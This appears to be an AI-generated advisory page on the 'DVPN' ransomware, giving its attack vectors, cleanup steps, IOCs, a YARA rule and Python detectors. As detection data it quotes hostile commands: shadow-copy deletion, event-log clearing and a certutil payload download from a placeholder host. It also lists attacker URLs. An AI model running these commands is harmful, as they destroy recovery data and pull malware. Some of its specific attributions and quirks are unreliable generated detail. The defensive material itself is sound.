dvpn

[Content by Gemini 2.5]


Community Resource – Ransomware “DVPN” (.dvpn)

Technical Breakdown

1. File Extension & Renaming Patterns

  • Confirmed extension: .dvpn (lower-case, four letters, appended as a SECONDARY extension).
    Example: Quarterly-report.xlsx → Quarterly-report.xlsx.dvpn
  • Additional artefacts left in every folder:
    README_TO_RESTORE.txt (sometimes HOW_TO_DECRYPT.hta dropped in %PUBLIC%).
    Typical note header:
    “>>>> Your network is ENCRYPTED with DVPN Locker <<<<”

2. Detection & Outbreak Timeline

  • Early public sightings: 13-Apr-2023 (ID-Ransomware uploads, Twitter)
  • Major campaign wave: 18-May-2023 → 01-Jun-2023 (health-care & local gov)
  • Still circulating “as-a-service” on Russian-language forums (June-2024)
  • AV sig names you will see in logs:
    Ransom:Win32/DVPNLocker.A, Trojan-Ransom.DVPN, RansomX-gen [Trj], DeepInstinct-Ransom.dvpn.1

3. Primary Attack Vectors

  1. Exploitation of un-patched public-facing services:
     • Fortinet CVE-2022-40684 (authentication bypass) → most common entry in 2023.
     • Citrix CVE-2023-3519 (code injection) appears in June-2024 incidents.
  2. RDP/SSH brute-force + credential-stuffing lists – once inside, PsExec & WMI to push dvpn.exe (usually named msupdate.exe or forservice.exe).
  3. Phishing with ISO / ZIP → LNK → PowerShell stager. ISO attachment boom in Apr-2024.
  4. Living-off-the-land:
     • Uses bitsadmin or certutil to pull the second-stage payload from hxxp://IP:8080/d1.bin.
     • Employs WinRAR to archive %USERPROFILE% before encryption (exfil for double-extortion).
     • Deletes VSCs with vssadmin delete shadows /all /quiet and clears event logs with wevtutil.
  5. Lateral movement: EternalBlue (MS17-010) still handy if SMBv1 is enabled; spreads dvpn.exe to ADMIN$ shares.
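  A small detector for the host-side traces named in section 1 (rename pattern, ransom-note names) and section 3 (vssadmin, wevtutil, bitsadmin/certutil download, dropper names), as an added Python example that is not part of the original resource. The event lines are constructed; labels reuse the page's ATT&CK IDs where they apply, plus the standard T1070.001 and T1105 for log clearing and tool download.

```python
import re

# Each rule: (label, event kind, regex). T1486/T1490 come from the page's
# ATT&CK map; T1070.001 (clear event logs) and T1105 (ingress tool transfer)
# are the standard IDs for the other two living-off-the-land tricks.
RULES = [
    ("T1490 vssadmin shadow deletion", "proc",
     re.compile(r"\bvssadmin(\.exe)?\s+delete\s+shadows\b", re.I)),
    ("T1070.001 wevtutil log clearing", "proc",
     re.compile(r"\bwevtutil(\.exe)?\s+cl\b", re.I)),
    ("T1105 LOLBin download of d1.bin", "proc",
     re.compile(r"\b(bitsadmin|certutil)(\.exe)?\b.*:8080/d1\.bin", re.I)),
    ("DVPN dropper filename", "proc",
     re.compile(r"\\(msupdate|forservice|dvpn)\.exe\b", re.I)),
    ("T1486 .dvpn secondary extension", "file",
     re.compile(r"\.[A-Za-z0-9]{1,10}\.dvpn$", re.I)),
    ("T1486 ransom note dropped", "file",
     re.compile(r"\\(README_TO_RESTORE\.txt|HOW_TO_DECRYPT\.hta)$", re.I)),
]

# Constructed events (not from a real incident): ("proc", command line) and
# ("file", path). 192.0.2.10 is a TEST-NET placeholder for the page's hxxp://IP.
SAMPLE_EVENTS = [
    ("proc", r"C:\Windows\System32\vssadmin.exe delete shadows /all /quiet"),
    ("proc", r"wevtutil.exe cl Security"),
    ("proc", r"certutil.exe -urlcache -split -f http://192.0.2.10:8080/d1.bin C:\Users\Public\d1.bin"),
    ("proc", r"C:\PerfLogs\msupdate.exe"),
    ("proc", r"C:\Windows\System32\svchost.exe -k netsvcs"),   # benign
    ("file", r"D:\Finance\Quarterly-report.xlsx.dvpn"),
    ("file", r"D:\Finance\README_TO_RESTORE.txt"),
    ("file", r"C:\Users\bob\Documents\notes.txt"),             # benign
]

def detect(events):
    """Return [(label, event text)] for every event matched by a rule of its kind."""
    hits = []
    for kind, text in events:
        for label, rule_kind, rx in RULES:
            if kind == rule_kind and rx.search(text):
                hits.append((label, text))
    return hits

def original_name(path):
    """For a file renamed by the locker, return its pre-encryption name, else None.
    The page's pattern keeps the real extension and appends .dvpn after it."""
    m = re.fullmatch(r"(.+\.[A-Za-z0-9]{1,10})\.dvpn", path, re.I)
    return m.group(1) if m else None

if __name__ == "__main__":
    for label, text in detect(SAMPLE_EVENTS):
        print(f"{label:34} {text}")
```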

Remediation & Recovery Strategies

1. Prevention (100 % cheaper than recovery)

  • Patch outside-in: FortiOS, Citrix-NetScaler, Exchange, & any SSL-VPN firmware inside 24 h.
  • Disable SMBv1 at scale (Disable-WindowsOptionalFeature -Online -FeatureName SMB1Protocol).
  • MFA everywhere: VPN, RDP, OWA, Citrix, SQL, etc.
  • Segment & filter: put critical servers on separate VLAN, allow only RDP jump-host.
  • Lateral-movement defence: enforce “LocalAdmin” tiering + Protected Users + LAPS.
  • Application whitelisting (WDAC/App-Ctrl): block *.exe running from %TEMP%, %PUBLIC%, C:\PerfLogs.
  • Disable Office-macros for Internet-zone attachments.
  • Immutable & off-line backups (3-2-1 rule) – Veeam “Linux hardened repo” or S3 Object-Lock.
  • Deploy free AV extensions: Microsoft “Block-Ransomware” ASR rules (rule ID 92e97fa1-2edf-4476-bdd6-9dd0b4dddc7b, “Block credential stealing…”) and Windows Defender “Network protection”.

2. Removal / Incident-Cleanup Checklist

  1. Disconnect the box from the network(s) instantly (pull cable / disable VM NIC).
  2. Collect a triage image (memory dump, MFT, journals) BEFORE disinfection if you intend to hunt or report.
  3. Identify persistence:
     • Scheduled task \Microsoft\Windows\DiskFootPrint\StorageOptimizer (runs C:\ProgramData\drvstore\dvpnsvc.exe).
     • Service DVPNetworkProvider (description “Provides network optimisation”).
  4. Boot into Safe Mode with Networking or mount the disk from a clean WinPE.
  5. Delete artefacts:
     %ProgramData%\drvstore\dvpnsvc.exe
     %ProgramData%\readme_to_restore.txt
     HKLM\Software\DVPNLocker (entire key)
  6. Undo damage:
     • vssadmin resize shadowstorage /for=C: /on=C: /maxsize=10% (restores shadow storage so VSCs can be re-created).
     • Re-enable the Windows Recovery Environment (reagentc /enable).
  7. Patch & harden (see §1).
  8. Re-scan with fully updated AV / EDR to confirm the hash-based IOCs are no longer present.
  9. Only now re-attach to the network, but keep the host on a quarantine VLAN until the SOC green-lights it.

3. File Decryption & Recovery

  • Decryptable? NO – DVPN uses Curve25519 + ChaCha20-Poly1305. Private key stays with the criminals.
  • No official Kaspersky/RCE/Bitdefender tool exists.
  • Semi-success alternatives:
    a) Shadow Volume Copy scraping: shadowcopyview.exe, esentutl, or PhotoRec for Shift-deleted originals.
    b) File-recovery tools: Recuva, R-Studio, TestDisk (only helps if disk was lightly used post-attack).
    c) Free “Previous Versions”: right-click encrypted file → Properties → Previous Versions (works if VSS deleted late or failed).
    d) Cloud/SaaS: check M365 “OneDrive Files Restore” or Google Drive “Manage versions”. They keep 30-100 days.
  • Payment risk: DVPN TOR panel lists $980–$5800 (depends on victim size). Even if paid, <70 % receive working decryptor (2024 “State-of-Ransomware” report).
  • Recommended: restore from off-line backup; if none exists, treat as permanent data loss and rebuild.

4. Other Critical Information / IOCs

  • YARA hunting rule (public, by @demonslay335):
  rule MAL_RANSOM_Win32_DVPNLocker {
      meta:
        author = "Michael Gillespie"
        description = "DVPN encryptor/dropper"
      strings:
        $s0 = "-----BEGIN DVPN CURVE25519 PUBLIC KEY-----" wide
        $s1 = ".dvpn" wide
        $s2 = "README_TO_RESTORE.txt" wide
        $s3 = { C7 45 ?? 64 76 70 6E 00 } // mov dword ptr [ebp+xx], "dvpn" (stack string)
      condition:
        uint16(0)==0x5A4D and 3 of them
  }
  • Network IOCs (grab from proxy/firewall):
    hxxp://194.147.78[.]11:8080/d1.bin
    hxxps://tqlkgceawsd6k3p7agr3wxlu32qz3vf7illarj6q2p7sirmcovedz6ad.onion[.]top/panel/login
  • MITRE ATT&CK map:
    T1190 (Exploit Public-Facing App), T1078 (Valid Accounts), T1021.001 (RDP), T1486 (Data Encrypted for Impact), T1490 (Inhibit System Recovery), T1041 (Exfil Over C2).
  • Noteworthy quirks:
    – Avoids CIS countries by checking GetSystemDefaultUILanguage.
    – Drops canary file C:\donotdelete.txt; if this file exists → self-deletes (used by operators to “vaccinate” their own machines).
    – Encrypts NAS shares alphabetically; network-mapped Linux/Samba drives are usually hit first (drive letter A comes first).
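  To show what the YARA rule above actually requires of a file, here is an added Python re-implementation of its condition (example code, not part of the original resource and not the rule author's): wide strings are matched as UTF-16LE, ?? is a one-byte wildcard, and uint16(0)==0x5A4D is the little-endian MZ header. The byte blobs are constructed stand-ins, not real samples.

```python
import re

# The rule's strings, transcribed from the page. "wide" means the text is
# matched as UTF-16LE, so we encode it that way; the hex string's "??" is a
# single-byte wildcard, written here as "." in a bytes regex with DOTALL.
WIDE_STRINGS = [
    "-----BEGIN DVPN CURVE25519 PUBLIC KEY-----",
    ".dvpn",
    "README_TO_RESTORE.txt",
]
HEX_PATTERN = re.compile(rb"\xC7\x45.\x64\x76\x70\x6E\x00", re.DOTALL)

def matches_dvpn_rule(data: bytes) -> bool:
    """Condition of MAL_RANSOM_Win32_DVPNLocker: uint16(0)==0x5A4D and 3 of them."""
    if data[:2] != b"MZ":                      # 0x5A4D little-endian is the bytes "MZ"
        return False
    hits = sum(s.encode("utf-16-le") in data for s in WIDE_STRINGS)
    hits += 1 if HEX_PATTERN.search(data) else 0
    return hits >= 3

def build_blob(mz, wide_strings, hex_present, ascii_extra=b""):
    """Construct a stand-in file body (not a real sample) with the chosen features."""
    blob = (b"MZ" if mz else b"PK") + b"\x90" * 0x3C
    for s in wide_strings:
        blob += s.encode("utf-16-le") + b"\x00\x00"
    if hex_present:
        blob += b"\xC7\x45\xF0\x64\x76\x70\x6E\x00"   # mov [ebp-10h], "dvpn" (stack string)
    return blob + ascii_extra

SAMPLES = {
    # dropper-like PE: two wide strings + the hex string = 3 of 4 -> match
    "dropper": build_blob(True, WIDE_STRINGS[1:], True),
    # the ransom note itself: no MZ header and no UTF-16 text -> no match
    "note": ("Your network is ENCRYPTED with DVPN Locker .dvpn "
             "README_TO_RESTORE.txt").encode("ascii"),
    # PE holding the same three strings as ANSI only: "wide" never sees them -> no match
    "ascii_pe": build_blob(True, [], False,
                           b".dvpn README_TO_RESTORE.txt -----BEGIN DVPN CURVE25519 PUBLIC KEY-----"),
    # PE with a single wide string: under the "3 of them" threshold -> no match
    "one_string": build_blob(True, [".dvpn"], False),
}

if __name__ == "__main__":
    for name, blob in SAMPLES.items():
        print(f"{name:11} -> {'MATCH' if matches_dvpn_rule(blob) else 'no match'}")
```

  The ascii_pe case is the practical caveat: because every string in the rule is wide only, a build that stores them as ANSI slips past it, so when tuning the rule for your EDR consider the ascii wide modifier.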

Bottom line: .dvpn is NOT decryptable; your only reliable route is clean backups plus fast patching of the Fortinet/Citrix vectors. Use the IOC list above to hunt residual threats and keep the YARA rule in your EDR for retroactive searching. Stay safe and patch early!